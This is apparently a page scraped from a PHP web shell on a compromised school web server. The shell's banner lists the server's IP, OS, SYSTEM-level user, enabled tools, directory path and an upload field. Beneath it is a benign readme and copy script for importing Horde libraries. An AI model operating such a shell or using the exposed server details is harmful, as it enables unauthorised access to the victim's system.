| Server IP : 172.67.187.206 / Your IP : 162.159.115.41 Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : SYSTEM ( 0) PHP Version : 5.6.30 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : E:/Inetpub/www/myschool/triamudom/tuprblearn/lib/horde/ |
Upload File : |
Description of import of Horde libraries
# Clone the Horde Git Tools repository and install. You will need
this for future updates:
https://github.com/horde/git-tools
# Make sure to follow the #Configuration step mentioned in the URL above. In
particular make sure to set the 'git_base' config option in conf.php
# Go into the repository cloned above and perform the following:
bin/horde-git-tools git clone
(Go for a coffee, this will take a while)
# Checkout the latest stable version for all repos, currently 5.2:
bin/horde-git-tools git checkout FRAMEWORK_5_2
# Copy the following script and store it on /tmp, change it's execute bit(chmod 777), and run it,
passing in your path to Horde (the directory you've cloned the repository):
/tmp/copyhorde.sh ~/git/base/directory/from/step/2
# Verify that these patches have been applied in the imported version. Apply them locally if not:
- https://github.com/horde/Mail/pull/1 (Mail component).
- https://github.com/horde/Imap_Client/pull/6 (IMAP Client component).
- https://github.com/horde/Crypt_Blowfish/pull/1 (PHP 7.4 compatibility, Crypt_Blowfish)
====
#!/bin/sh
source=$1
target=./lib/horde
echo "Copy Horde modules from $source to $target"
modules="Crypt_Blowfish Exception Idna Imap_Client Mail Mime Secret Socket_Client Stream Stream_Filter Stream_Wrapper Support Text_Flowed Translation Util"
rm -rf $target/locale $target/framework
mkdir -p $target/locale $target/framework/Horde
for module in $modules
do
echo "Copying $module"
cp -Rf $source/$module/lib/Horde/* $target/framework/Horde
locale=$source/$module/locale
if [ -d $locale ]
then
cp -Rf $locale/* $target/locale
fi
done